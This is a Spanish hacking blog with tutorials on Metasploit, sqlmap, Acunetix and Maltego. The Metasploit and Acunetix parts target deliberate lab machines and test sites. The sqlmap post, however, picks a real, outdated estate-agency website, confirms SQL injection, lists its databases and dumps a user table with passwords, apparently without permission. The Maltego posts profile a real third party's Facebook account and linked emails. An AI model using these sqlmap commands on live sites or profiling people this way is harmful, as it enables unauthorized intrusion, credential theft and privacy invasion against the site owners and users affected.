.

.

miércoles, 27 de abril de 2016

Metasploit - (Exploits y Payloads) - 3ªParte - Atacando un objetivo

Después de ver en la segunda entrada: Metasploit - Primeros pasos (Exploits y Payloads) - 2ªParte, el desarrollo y uso de Metasploit, en esta vamos a pasar a realizar un ejemplo real de la potencia que puede llegar a tener esta herramienta.

Para realizar esta práctica vamos a necesitar una máquina virtual (vmware) que supongo que ya la estás realizando para hacer tús prácticas, y una iso de Metasploitable 2 , un sistema de servicios vulnerables los cuales pueden ser explotados usando metasploit.
Solo tendrás que descargar una versión .iso de "Metasploitable 2" e instalarla como una nueva máquina virtual en Vmware.

Una vez la tengas instalada arrancas Metasploitable, la primera vez puede que tarde un poco de tiempo en cargar.
Como ya he dicho anteriormente, esta es una herramienta vulnerable que está creada por la gente de Metasploit para realizar pruebas de penetración, etc.






















Este será el aspecto de Metasploitable trás arrancar.
Nos pedirá un login. Para muchos tipos de pruebas es innecesario tocar nada más, simplemente dejarla así, pero para realizar esta práctica será más facil que sepamos el número de Ip que tomo esta máquina virtual.
De esta manera, donde indica "Login" ponemos "msfadmin" y pulsamos intro.
Después nos pedirá una pass, donde volvemos a introducir "msfadmin".

Ahora ya estaremos dentro del terminal de Metasploitable.
Para saber la IP metemos el comando "ifconfig".




















En mi caso la IP: 192.168.1.35

Sabiendo esto, dejamos la máquina abierta según está y nos vamos a nuestro Kali Linux o donde sea que estamos utilizando Metasploit.

Para hacerlo lo más real posible, vamos a ver que puertos pueden ser vulnerables dentro de la máquina objetivo, en este caso la de Metasploitable 2.

Dentro de "msf" (recuerdo que para arrancarlo, si lo hemos apagado la forma más rápida, es desde nuestro terminal de linux, el comando "msfconsole"), usamos el comando "nmap" y la ip del objetivo, para saber los puertos que tenemos abiertos.
Podemos usar -sV para saber las versiones que se están utilizando, lo cual nos facilitará mucho a la hora de buscar el "exploit" que utilizaremos para intentar vulnerar el sistema.















Para no ir más lejos, nos fijamos en el primer puerto que se nos muestra, el 21.
Este es el destinado a los servicios de "FTP" y como vemos está "open" (abierto).
En lo siguiente y muy importante que tenemos que fijarnos es en la versión que está utilizando:
"vsftpd 2.3.4".
Pues manos a la obra. Nos vamos a apoyar en lo ya visto en la entrada anterior, la segunda parte de este artículo.
En nuestro terminal "msf" introducimos la orden: #show exploits , pero de esta manera lo que conseguimos es que nos salgan todos los disponibles en sistema, así que vamos a ser más precisos.
Ya que sabemos la versión de FTP  ("vsftpd 2.3.4") vamos a aprocecharlo, así que utilizamos el comando: #search vsftpd







Por suerte nos a salido en la busqueda el exploit de la versión que tiene el FTP de nuestro objetivo.
Como ya vimos en la entrada anterior tomamos este exploit con el comando:
#use exploit/unix/ftp/vsftpd_234_backdoor
Vemos las opciones del exploit con: #show options
Introducimos cambios y las correspondientes direcciones de nuestro objetivo con:
#set RHOST 192.168.1.35
El puerto en este caso no hace falta cambiarlo ya que viene por defecto debido al exploit.
(TODO ESTO SE MÁS DETALLADAMENTE EN LA ENTRADA 2) 















Ya tenemos el exploit preparado para actuar sobre la dirección de nuestro objetivo.
En este caso no utilizaremos Payload ya que el "exploit" utilizado está creado especificamente para la vulnerabilidad concreta del FTP.

De esta manera ya solo nos queda ejecutarlo, asi que introducimos el comando "exploit" que será el que comience con la ejecución.





Según esta imagen, ya hemos tomado control de 192.168.1.35

¿Como lo comprobamos?
Muy facil, como ahora estamos dentro del FTP de la máquina atacada, lo que estamos viendo en nuestro terminal es justamente el interior de esa máquina, así que podemos meter un comando que nos verifique esto.
Yo introducire el comando para reiniciar "reboot" y pulso intro.
Nuestro terminal quedara a la espera...
Si inmediatamente nos vamos a ver que esta sucediendo en la máquina virtual de Metasploitable que dejamos abierta, veremos que está ocurriendo algo. Se está cerrando.












Finalmente se reiniciará y se volverá a abrir. Lo hemos conseguido!

Si volvemos a nuestro terminal "msf" podemos ver que nos indicará algo como:

192.168.1.35 - Command shell session 1 closed. Reason: Died from EOFError

Evidentemente nos encontrabamos dentro de 192.168.1.35, y nuestro terminal nos indica que esa sesión a muerto y por tanto hemos salido de ella.

Esto ha sido todo por el momento, seguimos con nuevas e interesantes entradas.

Un saludo y h@ppy h@cking!!


martes, 26 de abril de 2016

Metasploit - Primeros pasos (Exploits y Payloads) - 2ªParte

Bueno, vamos a ver como funciona esto.

Como ya hemos visto en la entrada anterior: Metasploit 1ªParte, tenemos para trabajar una serie de exploits. Podemos acceder a estos de una manera muy sencilla, mediante el comando "Show":
#show exploits



















Metasploit nos devolverá todos los exploits que tiene en su base de datos y podemos utilizar.
Vienen ordenados de tal manera que por columnas podemos ver en primer lugar el nombre y clase del "exploit" y a lo que vulnera.
En la siguiente la fecha del exploit, y en la tercera "Rank" el grado de gravedad=efectividad de dicho exploit.
Finalmente en la última columna de descripción, vemos a que esta destinado este exploit, sistema operativo, parte de él (app, etc.).

Para seleccionar cualquiera de ellos es muy facil, solo tenemos que teclear el comando "use" y el exploit elegido.






Para asegurarnos que tenemos accionado el exploit, como podemos apreciar en la imagen, pasa a color rojo.
Una vez que lo tenemos, para ver características/configuración del mismo, usamos el comando:
#show options





En este caso, tiene un Host y un Puerto de destino, que son a los que queremos atacar.
¿Como configuramos los datos de nuestro objetivo?
Muy facil,  con el comando "set". En este caso si queremos meter una dirección a la que queramos atacar, por ejemplo 192.168.1.0:
#set SVRHOST 192.168.1.0
Que queremos cambiar el puerto, pues lo mismo:
#set RPORT 69






Aquí lo tenemos cambiado y listo para lanzar.

El otro elemento que hemos dicho con anterioridad con el que podemos trabajar en Metasploit son los Payloads.
El proceso sería exactamente el mismo que con los "exploit"
Según estamos, con nuestro exploit seleccionado y ya configurado, para ver los "payload" que tenemos no tenemos más que: #show payloads
Eso sí, Metasploit viene preparado, de manera que reconoce el "exploit" que hemos seleccionado y al sistema operativo que pertenece, de manera que nos filtrara los resultados enseñandonos solo los "payloads" de este sistema operativo.




















Una vez elegido el que sea a nuestro gusto y uso, con el comando set y la ruta lo montamos.
#set PAYLOAD (nombre)
Ahora como ya hicimos anteriormente:
#show options  y vemos como ahora tenemos por un lado el "exploit" y por otro el "payload".







Si quisieramos realizar alguna modificación, como ya hemos visto, lo hariamos por medio del comando "set".


VER TERCERA PARTE


Metasploit - Primeros pasos (Exploits y Payloads) - 1ªParte

Esta entrada está dedicada a una herramienta que a mi me gusta mucho, ya que aunque a priori para los iniciados puede parecer complicada al desarrollarse su actividad exclusivamente por terminal, todo lo contrario, es muy facil de usar y además puede ayudarnos mucho dandonos resultados muy efectivos a la hora de desarrollar y ejecutar exploits.

Y es que se puede decir que Metasploit, nos da toda las facilidades, ya que teniendola debidamente actualizada, nos proporciona información sobre vulnerabilidades de seguridad y nos ayuda a explotarlas y ejecutarlas en una máquina remota. 

Sin duda a mi me parece una de las herramientas más completas para trabajar con exploits y hacer pruebas de penetración de forma masiva.

Aviso de antemano, que el contenido y las pruebas que se van a ver en esta entrada están realizadas en Metasploit para sistemas Linux, y concretamente desde la versión que viene integrada dentro de "Kali Linux".

Dentro de Kali, podemos buscar y abrir la herramienta como Metasploit, que estará seguramente en la sección de "Herramientas de explotación".
La segunda opción es simplemente dentro de nuestro terminal de linux escribir el comando "msfconsole"...








...con lo cual y tras unos segundos de carga, se abrirá la herramienta dentro del propio terminal.




































Como vemos, queda en modo "msf".
Al estar desarrollado dentro del propio terminal de linux, su uso es muy parecido y comparte muchos comandos.
Para comprobar esto a la par que vemos que opciones de comando nos ofrece, no tenemos más que escribir "help" y pulsar intro.































Bueno, pues antes de empezar con la materia hay que aclarar algún concepto, aunque sea por encima, ya que alguno de los lectores de este artículo pueden ser principiantes.

Con Metasploit, como ya se puede deducir de su nombre, vamos a trabajar con "Exploits" y además lo haremos también con "Payloads".
¿Que es esto?
Pues bien, así en una explicación muy muy básica:

Exploit: Su nombre viene de "Explotar", "Explotación", etc. Todos sabemos que dentro de los sistemas informáticos, de los programas, existen una serie de vulnerabilidades que como puntos débiles que son, si los forzamos y sabemos desarrollar, conseguiremos vulnerar y por tanto tener acceso a sus recursos, datos, poder controlarlos, incluso destruirlos, etc.
Pues un "Exploit" será un programa o código programado que nos ayudará a forzar esa vulnerabilidad para conseguir unos objetivos concretos.
Un exploit no es ni mucho menos "malware" como en algunos sitios definen o presentan, ya que "malware" es algo creado para el mal, para una mala intención, y sin embargo un "exploit" no es ni más ni menos que una herramienta para acceder a un agujero que ya está ahí.
El ejemplo más claro, representa a un sistema como un fortín, un edificio protegido y blindado, pero que tiene una "vulnerabilidad", que se han dejado una ventana en el tercer piso abierta para que ventile.
El exploit lo que sería en este caso sería una información que nos advierte de esta ventana abierta y nos facilita lo único necesario para aprovecharla, una escalera alta para llegar a la ventana y colarnos dentro del edificio.

Payload: Es ese software o código, que nos ayuda a aprovecharnos de las debilidades del sistema una vez que ya lo hemos vulnerado.
Utilizando el ejemplo anterior, una vez que ya hemos accedido al fortín a través de la ventana abierta, el Payload será quien nos ayude a aprovechar la oportunidad que se nos presenta. Un payload nos ayudará a abrir las puertas que nos encontramos dentro de esta nueva habitación, otro a nos ayudará a conseguir datos valiosos, otro a abrir otras ventanas para tener más accesos, etc.


Una vez hemos aclarados estos terminos y completando esta información, en esta herramienta como ya hemos dicho trabajaremos con "exploits" y "payloads" y deberemos de tenerla actualizada siempre, para que estos sean los máximos posibles y esten actualizados a los últimos encontrados.
Siempre que arranquemos Metasploit, este nos indicará en su parte inferior de la pantalla inicial de cuantos "Exploits" y "Payloads" disponemos.

























Ir a la segunda parte

domingo, 17 de abril de 2016

SQLMAP - Inyecciones automáticas de SQL

Esta tarde le ha tocado el turno de ser testeada a la herramienta "sqlmap".

Sqlmap es una herramienta perfecta para la realización de pruebas de penetración y muy util a la hora de ayudarnos a la hora de estar intentando detectar y explotar errores de inyección de SQL, además de facilitarnos el proceso de acceso a bases de datos. 

Como reza el titular en su web oficial, Sqlmap puede definirse como "la inyección automática de SQL y adquisición de base de datos pública".
En dicha web oficial podemos descargar la herramienta y tener acceso a documentación, etc.:
http://sqlmap.org/

Para probar la herramienta, lo primero que nos hace falta es una web en php y para que podamos ver algo vistoso, en este caso que sea vulnerable.
Sin complicarme la vida busco webs en php antiguas, abandonadas y por consiguiente desactualizadas, todo esto es igual a: Vulnerables.

Tenemos aquí esta web inmobiliaria, que parece no ser actualizada desde 2012 y tiene pinta de muy accesible: http://www.hidalhousing.net/pages/portada.php

Accedo a su pestaña de noticias para encontrar lo que estoy buscando:
http://www.hidalhousing.net/pages/amplianoti.php?id=22

Podemos ver que tiene un id de referencia. Si le añado al final un par de comillas ('')....



"ERROR"
Nos sirve para nuestro cometido por tanto.

Abrimos "Sqlmap". Como he dicho antes lo puedes descargar en: 
http://sqlmap.org/  o si utilizas Kali Linux como haré yo, ahí lo tienes disponible en el apartado de aplicaciones web.


Lo primero es intentar sacar las bases de datos, para si lo conseguimos luego trabajar directamente sobre ellas.
De es esta manera, le indicamos el comando sql y la url sobre la que queremos trabajar.

# sqlmap -u http://www.hidalhousing.net/pages/amplianoti.php?id=22



















Aquí vemos los resultados, obtenemos una serie de bases de datos.

Para este ejemplo voy a utilizar la primera:
Sql103544_1

# sqlmap -u http://www.hidalhousing.net/pages/amplianoti.php?id=22 -D Sql103544_1 --tables

Vamos a introducir el comando anterior, pero esta vez especificamos además de (-D) el nombre de la base de datos conseguida y añadimos (--tables) para que nos consiga las tablas de esta base de datos.


Ya tenemos sacadas las tablas. Como se puede ver a conseguido 96 tablas de la base de datos.
A partir de aquí ya todo es armarse de paciencia e ir buscando de donde podemos ir rebañando datos.

Efectivamente a parte de muchos datos interesante, podemos conseguir algunos concretos que nos faciliten seguir indagando como datos de usuario, que en el mejor de los casos consiguiendo credenciales podremos llegar a logearnos.

La formula seguiría siendo la misma:
( sqlmap -u http://www.hidalhousing.net/pages/amplianoti.php?id=22 -D Sql103544_1 ) en este caso añadiriamos al final la (-T) de tables y el nombre de la tabla en que queremos seguir trabajando de las 96 obtenidas en este caso, más el comando (--columns) . Algo así:

# sqlmap -u http://www.hidalhousing.net/pages/amplianoti.php?id=22 -D Sql103544_1 -T usuarios --columns























Como se puede ver, de la tabla usuarios hemos conseguido:

Clave, id, nombre y permisos.
Ahora podría acceder como este usuario sin problema a esta base de datos.
Y así sucesivamente iremos accediendo a más datos. El caso es que la web a sido totalmente vulnerada.

Con: # sqlmap -u http://www.hidalhousing.net/pages/amplianoti.php?id=22 -D Sql103544_1 --dump


















Con esto me despido por hoy.

Un saludo y happy hacking ;)

viernes, 15 de abril de 2016

Acunetix - Escaner de vulnerabilidades Web

En la entrada de hoy vamos a echar un vistazo a un potente escaner de vulnerabilidades de aplicaciones web "Acunetix".

Al igual que muchas veces utilizamos herramientas más específicas, a la hora de buscar un resultado concreto, con los escáneres de vulnerabilidades, gracias a su compendio de herramientas variadas y especializadas encontramos agujeros de seguridad que desconociamos, en este caso en aplicaciones web.

Es muy importante el uso de estos escáneres con asiduidad periódica, ya que cualquier vulnerabilidad que aparezca puede suponernos un susto y un problema, si es encontrado por algún atacante antes que por nosotros.

Acunetix, al igual que la mayoría de los escáneres de vulnerabilidades, nos ayuda a mejorar la seguridad de nuestro sistema, además de encontrando los puntos débiles (SQL Injection, Cross Site Scripting, desactualizaciones del sistema, passwords débiles, etc.) haciendonos una serie de sugerencias para evitarlas o soluccionarlas.

En su web oficial: http://www.acunetix.com/ , podemos dercargar una versión de prueba (de 14 días), que aunque tiene ciertas limitaciones (por ejemplo no nos genera informes), nos podemos hacer una idea de como funciona y los servicios que ofrece.

Una vez instalado, lo arrancamos ...


De entrada nos mostrará esto:




















Acunetix en un primer momento nos dará como vemos en esta ventana emergente, la opción de bajo una serie de opciones a rellenar, realizar un análisis de forma automática.
























































Si vamos rrellanando los datos que se nos piden, adaptandolos a los parámetros adecuados a nuestra busqueda, comenzará el análisis que hemos programado.

Si queremos configurar el análisis de forma manual, solo tenemos que cancelar esta ventana emergente y proceder a la elección de la herramienta a utilizar y configurarla adecuadamente a nuestro gusto.
Estas herramientas las veremos facilmente situadas en la columna izquierda de Acunetix.





























En esta entrada voy a probar el "Web escaner".
Podemos ver que en la parte superior, hay una barra de URL, en la que podremos introducir la web que queremos escanear.









La organización de Acunetix nos facilita una serie de URLs de webs vulnerables, para realizar las pruebas:

- http://testphp.vulnweb.com
- http://testasp.vulnweb.com
- http://testaspnet.vulnweb.com
- http://testhtml5.vulnweb.com

Podeís utilizar cualquiera de estas para realizar los análisis y escaneos.
En este caso, yo voy a utilizar:
- http://testhtml5.vulnweb.com

La introduzco en "Start URL" y doy a comenzar.

El escaneo empieza y podemos ver como instantaneamente empezamos  a tener los primeros resultados, aunque la realización del escaneo completo suele tardar bastante tiempo, dependiendo la complejidad de la web.





























En el centro de la pantalla podemos ver los errores que el escaner va encontrando en la web.
Se encarga de diferenciar la gravedad del error encontrado, de vulnerabilidad muy grave, a leve.
Esta diferenciación, nos la va señalando con colores, siendo el rojo el de mayor gravedad, amarillo gravedad media y verde leve.

 
En la columna de la derecha, si pinchamos una de los resultados en concreto, se nos especificará en que consta esta vulnerabilidad, que peligro supone, y nos aconseja como podríamos soluccionarla.


En la web que estamos analizando - http://testhtml5.vulnweb.com - el escaner como podemos observar, ha encontrado por el momento: Un Cross site scripting, XML injection, vulnerabilidades en HTML, de Javascript library, etc...

Vamos a seleccionar la de Cross site scripting, a ver que nos indica Acunetix.


Vamos a fijarnos en los detalles.



Vemos los detalles del ataque realizado por acunetix, el impacto de las vulnerabilidades, etc.
Haciendo un correcto uso de esta información, y bajo los consejos que nos ofrece la herramienta, deberemos de poner solucciones a los problemas detectados.


De la misma manera, si vamos seleccionando las demás vulnerabilidades encontradas, cada una tendrá sus especificaciones técnicas concretas.








sábado, 9 de abril de 2016

MALTEGO - Primeros pasos - Recopilación de datos básica (Segunda Parte)

Continuamos donde lo dejamos en la primera parte de este artículo:
MALTEGO - Primeros pasos - Recopilación de datos básica(Primera parte

Nos quedamos viendo como se configuraba la opción "Affiliation - Facebook"


 Ante alguna duda volver a ojear la entrada anterior.

Cuando ya la tenemos configurada con los datos de la persona (usuario) del que vamos a recopilar información, pulsamos con el boton derecho sobre el icono de Facebook.










 Como vemos nos devuelve una serie de opciones.
Lo primero que podemos leer, es que nos da la opción de elegir entre el "perfil de usuario" o las "imagenes de perfil". Más a la derecha vemos unos pequeños iconos, el de la ventana con un pequeño engranaje, como ya habréis supuesto es la configuración. Podéis meteros en esta configuración y ver la multitud de opciones y posibilidades que se nos ofrecen (en esta entrada lo vamos a dejar según viene automático, ya inspeccionaremos más en esta configuración en futuras entradas).
 El icono más al extremo (un simbolo de "play" de toda la vida) si colocamos el cursor sobre el vemos como nos refleja "Run", con el empezará a correr la acción.
Pulsamos "Run" de "profile image".
Vemos como en la barra inferior de la ventana de Maltego, comienza a cargar la acción.
En unos segundos bajo nuestro icono de Facebook tendremos un nuevo icono.
Volvemos a hacer la misma opción sobre el mismo icono y esta vez seleccionamos "Run" en la opción "person from profile".

Ahora debemos de estar viendo esto:



 ¿Qué tenemos aquí?
Parece ser que la cuenta de Facebook que habíamos seleccionado para el estudio, esta enlazada o compuesta por "un usuario" y "una/s imagen/es".

Vamos a seguir trabajando con el perfil de usuario que acabamos de obtener, para ver como funciona la herramienta "Maltego.
Como vemos o podemos intuir, lo que hace la aplicación es coger el activo que nosotros le hemos indicado (usuario, web, mail, etc.) y ver que otros activos estan enlazados, tienen relación con él.

 De la misma manera que hemos trabajado sobre el perfil de Facebook seleccionado, vamos a proceder sobre el perfil de usuario que hemos conseguido.
Le pulsamos con el botón derecho y como vemos nos ofrece unas opciones diferentes a las anteriores. Esto se debe a que el activo que vamos a investigar es de diferente tipología al anterior, que era simplemente un perfíl de red social, ahora se supone como usuario físico, el que estaba detrás de ese perfíl social, por lo tanto las opciones son para investigar que cuentas (mail, sociales, números de teléfono, páginas web, etc.,) están enlazadas a ese individuo.

Vamos a seleccionar que nos verifique con que cuentas de email está relacionado este usuario.



 En este ejemplo en concreto vemos que esta relacionado con tres cuentas de email diferentes, y las cuales posiblemente esten relacionadas con otros perfiles sociales en otras redes, o con otras web o mails.
Si hiciesemos lo propio y seguimos tirando del hilo podemos descubrir muchas cosas. Obviamente esto es una entrada básica y de toma de contacto con la herramienta, pero un hacker en un buen proceso de recopilación de información, puede emplear horas, dias, semanas, etc.





Para que veais la potencia de esta herramienta, con un ejemplo mejor al de esta cuenta de Facebook que no nos va a dar muchos resultados por lo menos a priori (visualmente), como podemos observar los mail que estabamos tratando son Gmail, pertenecen a Google.
Si nosotros le decimos a Maltego que nos busque el dominio al que pertecen esta direcciones de email, evidentemente no devolverá... ¿Qué?
Gmail.com



Evidentemente, los resultados que nos va a devolver este dominio de gran envergadura, visualmente como ejemplo para esta entrada, son infinitamente mayores.
Le podemos pedir equipos relacionados, webs, dns, mails, etc...















Según vayamos consiguiendo más y más recultados deberemos ir ordenandolos si no nos queremos volver locos. Eso ya a gusto del consumidor, ya que podemos mover los iconos a mano, o como vemos en la barra superior Maltego nos ofrece diferentes esquemas de distribución, que si los clicamos el nos reordena el esquema automáticamente.































Seguiremos investigando mucho más a fondo todas las opciones que nos ofrece Maltego en próximas entradas.

Un saludo y Happy Hacking!!

viernes, 8 de abril de 2016

MALTEGO - Primeros pasos - Recopilación de datos básica


Hoy le toca el turno de ser inspeccionada y dedicarle una pequeña introducción a "Maltego", una de mis aplicaciones favoritas a la hora de recolectar información.

Podemos describir a esta aplicación, como una herramienta perfecta para la fase de "Recolección de datos" y minería, la cual va analizando relaciones e interconexiones, entre personas (usuarios), páginas web, cuentas de mail, redes, dominios, afiliaciones sociales, etc., llegando a crear una red de movimientos y contactos que forman el entramado diario de comportamiento de una persona, o grupo.

Maltego ayuda a obtener una información muy valiosa a la par de peligrosa, ya que puede llevar a seguir un rastro perdido, formar un patron de comportamiento, un perfil psicológico, todo esto cruzando información, datos, contactos, perfiles, a través de internet.

Ahora para verlo más de cerca vamos a prácticar un poco.
Podemos encontrar maltego como parte de "Kali Linux", o si no tenemos Kali, tendremos que descargarlo desde su página oficial e instalarlo en nuestro equipo.
https://www.paterva.com/web6/

Yo hoy por cambiar las prácticas habituales, he decidido crear una máquina virtual de "Windows 10" y he instalado su versión adecuada de Maltego.

Abrimos "Maltego" y ojo!! Si es la primera vez que lo abres.
* Podemos encontrar Maltego en versión de pago bajo licencia y una versión gratuita, que es la que vamos a utilizar. Cuando abras la aplicación por primera vez, te pedirá que te identifiques (Usuario/Contraseña). Debes de ir a la web de "Paterva" (posiblemente el formulario inicial te redireccione) y registrarte. Simplemente te pide una cuenta de mail, que te inventes una contraseña que será la que utilices y que pinches el link en mail que ellos te envíen.
Ya tienes tu cuenta creada, podemos empezar.



Esto va a ser lo primero que nos vamos a encontrar, una ventana que nos ofrece una serie de posibilidades u opciones, para empezar a funcionar.
En este ejemplo en concreto pasamos de ventanas, pulsamos cancelar puesto que vamos a ver como funciona Maltego de forma manual.

Como esta entrada esta destinada a ser una primera toma de contacto con esta aplicación, vamos a hacer algo relativamente sencillo, por lo que vamos a intentar analizar un perfil de una red social (Facebook) para intentar sacar emails, usuarios, u otras conexiones.

El primer paso:



Como podemos ver en la columna de la izquierda hay varias opciones o actividades posibles. Elegimos la que reza "Affiliation - Facebook", la pinchamos y arrastramos hacia el centro de la pantalla, en este cuadrado que va a ser nuestra especie de zona de trabajo.

Damos doble click en el icono que acabamos de arrastrar y se nos abre una ventana emergente con una serie de pestañas y opciones.

Como víctima para el estudio he elegido un perfil de una comunidad musical, pero desde aquí recomiendo que cualquier práctica la hagáis con vuestros propios perfiles, por dos razones fundamentales, privacidad de otros usuarios (no es muy legal investigar a nadie sin su consentimiento) y dos porque es fundamental que conozcais el estado de vuestras cuentas y la información que están transmitiendo.

En la ventana emergente abrimos la pestaña de "Propiedades".



Como veis, hay varios campos a rellenar.
  1. Name:  El nombre que tiene en Facebook quien quereis investigar.
  2. La red la pone por defecto (Facebook).
  3.  UID: Es el número de identificación que tiene ese usuario en Facebook. ¿Como lo sabemos? Nos metemos en el perfil de este usuario, en sus fotos subidas por el a la red social y si observamos todas llevan ese código de identificación personal. 





 Si nos fijamos bien, ese número entre los dos puntos al final de la secuencia se repetirá en todas las fotos del usuario.


    4.URL. Aquí, nos metemos a la página principal del perfil del usuario, copiamos la dirección y la pegamos en este apartado.

Finalmente, cerramos la ventana emergente y ya a quedado configurada.




Seguimos con la explicación en:
MALTEGO - Primeros pasos - Recopilación de datos básica (Parte 2)